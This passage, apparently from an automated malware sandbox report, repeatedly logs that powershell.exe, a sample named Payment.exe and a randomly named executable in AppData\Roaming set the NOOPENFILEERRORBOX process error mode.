                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
